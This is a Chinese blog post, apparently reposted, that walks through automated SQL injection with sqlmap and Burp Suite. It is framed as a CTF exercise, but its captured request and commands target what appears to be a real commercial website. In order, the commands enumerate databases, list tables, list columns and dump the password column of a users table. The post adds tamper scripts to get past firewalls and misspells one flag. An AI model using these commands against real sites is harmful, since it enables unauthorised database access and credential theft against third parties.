您的位置:首页 > 产品设计 > UI/UE

SQLMAP 脚本自动注入应用(burpsuit辅助)

2016-08-06 15:02 603 查看
一道nctf的注入题目

具体的步骤如下:

sqlmap注入命令1

sqlmap注入命令2

第一步 burpsuit获取报头

运用burpsuit抓包,获取http报头



GET /services.php?id=4 HTTP/1.1
Host: www.backstagecommerce.ca
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: __cfduid=d8e66c3c7470ab2dae745171ba4dccd181469886263; _ga=GA1.2.1383706248.1469886265
Connection: close


第二步 报头存档

这一步将上面内容存在test.txt里面



第三步 爆出现在使用的数据库

利用sqlmap,进行自动注入

执行语句

sqlmap.py -r "D:\sqlmapproject-sqlmap-be9381a\test.txt" -p id --dbs
//-p 跟的是参数这里为id  想要暴库就输入--dbs


利用这句代码报数据库内容



爆出了数据库

或者利用下面代码爆出当前使用的数据库

sqlmap.py -r "D:\sqlmapproject-sqlmap-be9381a\test.txt" -p id --current-db




当前使用的数据库为’db1052699_bsc’

第四步 爆出数据库中有用的数据表

利用下面语句爆数据库里的数据表

sqlmap.py -r "D:\sqlmapproject-sqlmap-be9381a\test.txt" -p id --tables -D "db1052699_bsc"




看到了users的数据表,接下来下面就来爆字段啦

第五步 爆数据表中的字段

利用下面语句爆字段

sqlmap.py -r "D:\sqlmapproject-sqlmap-be9381a\test.txt" -p id --columns -T "users" -D "db1052699_bsc"




看到了password字段,接下来就要爆内容啦

第六步 爆出有用字段的内容

最后一步爆字段内容

sqlmap.py -r "D:\sqlmapproject-sqlmap-be9381a\test.txt" -p id --dump -T "users" -D "db1052699_bsc" -C "password"




密码被爆破出来啦

--bacth
自动化

--tamper=charencode.py,modsecurityversioned.py,randomcase.py,space2morehash.py,varnish.py
加入绕过
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息